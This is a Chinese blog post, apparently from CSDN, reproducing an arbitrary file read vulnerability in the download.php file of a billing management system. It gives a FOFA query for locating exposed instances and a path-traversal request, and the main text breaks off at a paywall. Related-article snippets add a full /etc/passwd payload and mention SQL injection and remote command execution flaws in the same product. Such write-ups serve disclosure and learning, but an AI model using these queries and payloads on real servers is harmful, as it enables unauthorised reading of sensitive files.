蓝海卓越计费管理系统 download.php 任意文件读取漏洞

最新推荐文章于 2024-08-29 14:28:28 发布
最新推荐文章于 2024-08-29 14:28:28 发布
阅读量434 收藏
点赞数
分类专栏: 网络安全 web安全 渗透测试 漏洞复现 文章标签: php 开发语言 安全 漏洞复现 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u010025272/article/details/131394277
版权
本文介绍了蓝海卓越计费管理系统download.php存在的任意文件读取漏洞,攻击者能通过目录遍历获取服务器敏感信息。讨论了漏洞影响,并提供了在fofa上的搜索条件。复现过程涉及file参数的用户可控性。
摘要由CSDN通过智能技术生成

0x01、漏洞描述

蓝海卓越计费管理系统 download.php文件存在任意文件读取漏洞,攻击者通过 …/ 遍历目录可以读取服务器上的敏感文件

0x02、漏洞影响

蓝海卓越计费管理系统

0x03、fofa

title==“蓝海卓越计费管理系统”

0x04、漏洞复现

登录页面如下:
在这里插入图片描述
出现漏洞的文件为 download.php ,其中 file参数 存在用户可控

发送如下请求包:

GET /download.php?file=../../../../
了解本专栏 订阅专栏 解锁全文 超级会员免费看
丢了少年失了心1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
蓝海卓越计费管理系统 agent_setstate.php SQL注入漏洞复现
0xSec
05-24 671
蓝海卓越计费管理系统 agent_setstate.php 接口存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。
实战 - 蓝海卓越计费管理系统 debug.php 远程命令执行漏洞
HAKUNAMATATATTA的博客
05-30 483
蓝海卓越计费管理系统 debug.php 存在命令调试页面,导致攻击者可以远程命令执行。
蓝海卓越 计费管理系统 download.php 任意文件读取漏洞
weixin_46801402的博客
11-21 630
蓝海卓越 计费管理系统 download.php 任意文件读取漏洞
蓝海卓越计费管理系统 debug.php 远程命令执行漏洞
孤桜懶契
04-18 2869
漏洞描述 i ⭐蓝海卓越计费管理系统 debug.php 存在命令调试页面,导致攻击者可以远程命令执行 漏洞影响 s ✅蓝海卓越计费管理系统 空间测绘 d ⭕Hunter:web.title="蓝海卓越计费管理系统" 漏洞复现 ✅访问首页 ✅执行Payload命令,访问路径/debug.php $ ifconfig eth0 Link encap:Ethernet HWaddr 00:21:9B:FB:30:27 inet addr:192.168.0.1 Bcast:192.168.
某购物商城系统commodtiy接口处存在任意文件上传漏洞
weixin_43167326的博客
05-10 835
某购物商城系统commodtiy接口处存在任意文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
蓝海卓越计费管理系统漏洞学习——download.php 任意文件读取漏洞
记录并分享学习安全的知识点..
10-02 472
蓝海卓越计费管理系统 download.php文件存在任意文件读取漏洞,攻击者通过 ../ 遍历目录可以读取服务器上的敏感文件
蓝海卓越计费管理系统任意文件读取漏洞
Cwillchris的博客
06-16 264
将上面爬取到的文件(一般是final****.txt)移动到脚本目录下,保存为1.txt。python3 fofa-cwillchris.py -k "蓝海卓越计费管理系统"./蓝海卓越计费管理系统.bin -l 1.txt (先用fofa脚本爬取所有碧海威相关资产(
蓝海卓越计费管理系统任意文件读取
weixin_51387754的博客
05-19 430
注:互联网资产非授权请勿测试 Fofa搜索: title=“蓝海卓越计费管理系统漏洞利用 https://120.0.0.1:7788/download.php?file=…/…/…/…/…/etc/passwd 漏洞出现的⽂件为 download.php ,其中 file=参数用户可控 二.漏洞POC /download.php?file=../../../../../etc/passwd 漏洞修复 对下载路径进行过滤,如下载前对传入的参数进行过滤,并且对下载文件类型进行检查,是否是允许下载的类
蓝海卓越计费管理系统远程命令执行
吾所在处,即为净土
07-30 365
活着,就要时刻准备承受磨难!
蓝海卓越认证计费管理系统免费版使用说明.
12-24
蓝海卓越认证计费管理系统免费版使用说 明 很好的认证计费软件还是免费版的
使用 树莓派3B+ 对日本葡萄园进行经济实惠的环境监测
最新发布
EDATEC的博客
08-29 811
然而,他也热衷于酿造 “优质葡萄酒”,随着他所居住的东京北部胜沼地区葡萄酒旅游业的兴起,他感觉到了商机。菊岛热衷于在他所谓的 “Hinno ”物联网系统中使用太阳能,日语中的 “Hinno ”表明这是一种简单的农民葡萄栽培方法,因为太阳能还可以用来为电栅栏供电,防止动物靠近作物。他还可以在办公室里随时观察大气状况。对于 菊岛邦夫—Vineyard Kikushima 而言,Raspberry Pi 生态系统提供了支持和信息,通过基于温度和湿度监测的有针对性的最低限度杀虫剂方案,来提高葡萄的健康产量。
Nginx的lnmp服务搭建
2201_75745826的博客
08-29 736
nginx是一款功能强大的web服务器。和apache一样,有http和https两个服务。nginx功能强大,且库使用第三方模块,正反向代理等。Nginx默认采用多进程工作方式,Nginx启动后,会运行一个master进程和多个worker进程。其中master充当整个进程组与用户的交互接口,同时对进程进行监护,管理worker进程来实现重启服务、平滑升级、更换日志文件、配置文件实时生效等功能。worker用来处理基本的网络事件,worker之间是平等的,他们共同竞争来处理来自客户端的请求。
【Linux篇】网络请求和下载与端口
2301_80912559的博客
08-26 1161
如图,计算机A的微信连接计算机B的微信,A使用的50001即动态端口,临时找一个端口作为出口。计算机B的微信使用端口5678,即注册端口,长期绑定此端口等待别人连接。在win系统中,可以通过任务管理器选择进程后,点击结束进程从而关闭。IP地址相当于小区地址,在小区内可以有很多住户(程序)而门牌号(端口)就是各个住户(程序)的联系地址。为管理运行的程序,每一个程序在运行的时候,便被操作系统注册为系统中的一个进程。计算机程序之间的通讯,通过IP只能锁定计算机,但是无法锁定具体的程序。
第三章 封装与继承
weixin_65279640的博客
08-28 1082
面向对象三大特征之一 ——封装概念:将类的某些信息隐藏在类内部,不允许外部程序直接访问,而是通过该类提供的方法来实现对隐藏信息的操作和访问把尽可能多的东西藏起来,对外提供便捷的接口。说白了就是把对象中的属性信息封装在对象类内部,不让用户直接使用类属性进行访问,而是定义一个方法作为类属性的接口提供给用户访问使用。封装的两个大致原则把所有的属性藏起来把尽可能多的东西藏起来,对外提供便捷的接口。
Upload-Lab第20关:如何利用文件名可控漏洞
didiplus
08-27 345
在Upload-Lab的第20关中,系统没有对上传文件的内容进行验证,而是仅对用户输入的文件名进行了检查。具体来说,系统使用文件后缀名的黑名单进行过滤,但由于上传的文件名是用户可控的,这为绕过机制提供了可能性。此外,函数还有一个特性,即它会忽略文件名末尾的/.,这可以被利用来绕过后缀名的黑名单检查,从而上传恶意文件。通过这一关的学习,我们可以深入理解 Apache 配置文件的作用及其在安全防护中的重要性。同时,这也提醒我们在设计和开发上传功能时,必须考虑到所有可能的攻击面,确保服务器配置的安全性和稳健性。
畅捷通CRM newleadset.php SQL注入漏洞复现
0xSec
08-26 495
用友畅捷CRM newleadset.php 处存在SQL注入漏洞 ,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
蓝海卓越认证计费管理系统免费版全面教程
蓝海卓越认证计费管理系统免费版使用说明是一份针对mikrotik公司RouterOS(ROS)软路由产品的详细指南,它利用了RouterOS的强大功能,如无线管理、认证、策略路由和带宽控制,以低成本提供高性能的网络解决方案。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

丢了少年失了心1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值